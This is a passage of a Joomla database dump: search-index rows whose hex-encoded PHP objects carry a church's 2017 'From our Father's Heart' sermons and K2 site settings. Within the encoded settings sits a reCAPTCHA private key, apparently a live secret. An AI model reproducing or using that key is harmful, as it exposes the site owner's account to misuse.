f7468696e6720656c73652061706172742046524f4d2054484520574f5244204f4620474f442e20c2a0416e797468696e67206f75747369646520746865204269626c652c2074686520646576696c2069732074686572652e3c2f703e0d0a3c703e332e2053656172636820746865204269626c6520666f72207768617420476f642068617320736169643c2f703e0d0a3c703e342e20426567696e20746f206d656469746174652075706f6e207468656d2c206d656d6f72697a65207468656d2c20616e642073746f7265207468656d20696e20796f757220686561727420756e74696c20796f75206b6e6f77207468656d2062792068656172743c2f703e0d0a3c703e352e204c697374656e2077656c6c20696e2063687572636820666f72207768617420476f6420686173207361696420692e652e2050726f706865636965732e2054686174206973207768617420476f642077696c6c20646f2e204d65646974617465206f6e2069742c2073746f726520697420696e20796f757220686561727420616e64206d656d6f72697a652069742e3c2f703e0d0a3c703e362e20446f6ee280997420737065616b20696e207468652068656174206f66206e656761746976652070617373696f6e2e204469736369706c696e6520796f7572206d6f75746820746f20737065616b206f6e6c79207768617420476f642068617320736169642e20426520636f6e73697374656e7420756e74696c20796f752073656520726573756c742e20526573756c742077696c6c20636f6d65206c6974746c65206279206c6974746c6520616e642069742077696c6c20626567696e20746f20616363656c65726174652e20426520626f6c6420746f206465636c617265207768617420476f642068617320736169642e3c2f703e0d0a3c703e372e204d61696e7461696e2046656c6c6f777368697020776974682074686520486f6c792053706972697420616e642066656c6c6f772062656c6965766572732e2053657061726174652066726f6d2070656f706c6520746861742077696c6c2061747461636b207768617420697320696e20796f75722068656172742e3c2f703e0d0a3c703e54616b6520746865736520706f696e747320616e6420737461727420612070726f6772616d206e6f77207768656e206974206973206e6f7420746f6f206c61746520616e64207768656e207468657265206973206e6f2070726573737572652e20446f6e2774207761697420756e74696c2074686572652069732061207369636b6e657373206265666f726520796f752066696e64206f7574207768617420476f6420686173207361696420636f6e6365726e696e6720796f7572206865616c74682ec2a03c2f703e0d0a3c703e4275696c6420757020796f757220776f72642062616e6b206e6f77213c2f703e0d0a3c703e54696c6c206e657874207765656b20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f64e28099732053657276616e743c2f703e0d0a3c703e526576204f6c75736f6c61204172656f67756e2e3c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d32392031343a30333a3332223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2235223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a32363a2231383a66726f6d2d6f75722d6661746865722d732d6865617274223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34343a22636f6d706f6e656e742f6b322f6974656d2f31382d66726f6d2d6f75722d6661746865722d732d6865617274223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3138223b733a353a22726f757465223b733a36333a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31383a66726f6d2d6f75722d6661746865722d732d6865617274223b733a353a227469746c65223b733a33373a2246726f6d206f757220466174686572277320486561727420202832322f30312f3230313729223b733a31313a226465736372697074696f6e223b733a3238373a2220446561726c792042656c6f766564206f6620476f642c203230313720476f642077616e747320796f7520746f2067657420697420726967687420696e20796f75722077616c6b20776974682048696d2e204f6e636520796f75206172652061626c6520746f206765742069742072696768742c206974206265636f6d65732065617369657220666f7220476f6420746f20776f726b207769746820796f752e204c6574206d652073686f7720796f7520736f6d65206b65797320746f2067657474696e6720697420726967687420736f207468617420796f752077696c6c2062652061626c6520746f2070726f677265737320746f20746865206e6578742073746167652077686963682069732067657474696e67206265747465722e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d32322031303a31393a3230223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d32322031303a31393a3230223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(256, 'index.php?option=com_k2&view=item&id=20', 'index.php?option=com_k2&view=item&id=20:fathers-heart-29-01-2017', 'From our Father\'s Heart (29/01/2017)', ' Dearly beloved, You must operate in the glory by prophecy this year. This is a house of prophecies and there are a lot added unto us in the ongoing 84 days fasting and prayers. You must wrap your life with them and let them decide your experiences in 2017. ', '2017-06-25 14:19:32', 'a8070849a831ebf5020a0301c29fbf8c', 1, 1, 1, '*', '2017-01-29 14:04:13', '0000-00-00 00:00:00', '2017-01-29 14:04:13', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223230223b733a353a22616c696173223b733a32343a22666174686572732d68656172742d32392d30312d32303137223b733a373a2273756d6d617279223b733a3237333a223c703e446561726c792062656c6f7665642c3c2f703e0d0a3c703e596f75206d757374206f70657261746520696e2074686520676c6f72792062792070726f7068656379207468697320796561722e2054686973206973206120686f757365206f662070726f7068656369657320616e64207468657265206172652061206c6f7420616464656420756e746f20757320696e20746865206f6e676f696e6720383420646179732066617374696e6720616e6420707261796572732e20596f75206d757374207772617020796f7572206c6966652077697468207468656d20616e64206c6574207468656d2064656369646520796f757220657870657269656e63657320696e20323031372e3c2f703e0d0a223b733a343a22626f6479223b733a323331373a220d0a3c703e4e6f74206576657279626f647920736565732074686520676c6f727920636c6f75642c206e6f74206576657279626f6479206d6f76657320776974682074686520676c6f72792c2062757420492070726179207468617420796f752077696c6c207365652069742c20796f752077696c6c206d6f7665207769746820697420616e6420796f752077696c6c2070657263656976652069742e205768656e2049737261656c206c6566742045677970742c2074686520676c6f727920636c6f7564206d6f7665642075707761726420616e6420666f7277617264e2809574686f736520617265207468656972206f6e6c792074776f20646972656374696f6e732e2054686579206469646ee2809974206d6f7665207768656e2074686520676c6f727920636c6f7564206469646ee2809974206d6f76653b207768656e2074686520676c6f727920636c6f7564206d6f7665642c207468657920616c736f206d6f76656420616e642074686579206e65766572206c61636b65642e20546865204269626c6520736179732c207768656e2074686520736561207361772074686520676c6f727920697420666c65643a204a6f7264616e207761732064726976656e206261636b2e20c2a0546865206d6f756e7461696e7320736b6970706564206c696b652072616d732c20616e6420746865206c6974746c652068696c6c73206c696b65206c616d62732e20c2a04d617920796f75206d6f766520776974682074686520676c6f727920636c6f756420696e20323031372e20546865726520617265206e6577207468696e6773207765206163686965766520616e64206163636f6d706c697368206173207765206d6f766520776974682074686520676c6f727920636c6f75642e3c2f703e0d0a3c703e546865726520697320616e20616e6f696e74696e6720666f7220627265616b696e67206e65772067726f756e64732c2073686174746572696e67206e65772067726f756e64732c207768617420796f752068617665206e6f7420646f6e65206265666f726520696e20796f7572206c6966652c207768617420686173206e6f74206265656e20646f6e65206265666f726520696e20796f757220616e6365737472792e20596f752061726520627265616b696e67206e657720626172726965727320696e203230313720696e204a65737573206e616d652c206f7468657273206d617920676f20646f776e206275742077652061726520676f696e67206869676865722c206e6577206865696768747320696e20323031372c206e6577206865696768747320666f722075732c206e657720726f6f6d732c206e6577207265616c6d732c206e6577207468696e67732c206e65772067726f756e64732e3c2f703e0d0a3c703e4e6568656d69616820746f6f6b203532207765656b7320746f20636f6d706c65746520686973206a6f622e20596f757220636f6e66657373696f6e20746869732079656172206f76657220796f75722070726f6a656374206d7573742062652c20e2809c54686f7520736169746820746865204c6f72642c206d792068616e64732068617665206c6169642074686520666f756e646174696f6e206f662074686973206275696c64696e673b206d792068616e64732077696c6c2066696e6973682069742e2049207368616c6c206c6f6e6720656e6a6f792074686520776f726b73206f66206d79206c61626f75722ee2809d204d617920796f7520626520636f6d706c65746520696e20323031372e2054616b65206e6f7465206f66207768617420746865204c6f72642068617320736169642c20616e6420616c7761797320726566657220746f207468656d20696e20796f7572206e6f7465626f6f6b732e204b65657020737065616b696e67207468656d2c206b656570206465636c6172696e67207468656d2e205768656e20796f75206172652070726f7068657379696e672c206974206973206e6f74207468652074696d6520746f207072617920696e20746f6e677565732e204a757374206c657420746865206c696665206f6620476f642070726f63656564206f7574206f6620796f7572206d6f75746820696e20746865206e616d65206f66204a657375732e3c2f703e0d0a3c703e54616b6520616c6c207468652070726f706865746963206465636c61726174696f6e7320476f642068617320676976656e20746f20757320616e642072652d696e74726f64756365207468656d20696e746f20796f7572206c696665207769746820796f7572206f776e206d6f7574682e204c657420796f757220636f6e66657373696f6e2062652c20e2809c626520697420756e746f206d65206163636f7264696e6720746f207468697320776f726420696e2032303137e2809d2e20456e6c6172676520796f757220666169746820617320796f752070726f70686573793b20796f75206172652074617070696e6720696e746f2074686520706f776572206f662070726f706865637920617320796f7520737065616b2074686f736520776f7264733b206c6574206974206e6f742073746f70206c657420697420636f6e74696e75652e20596f752063616e207265617272616e676520796f7572206c69666520746f64617920776974682074686520706f776572206f662070726f7068657379696e67206465737069746520616c6c206d697374616b6573206f722074686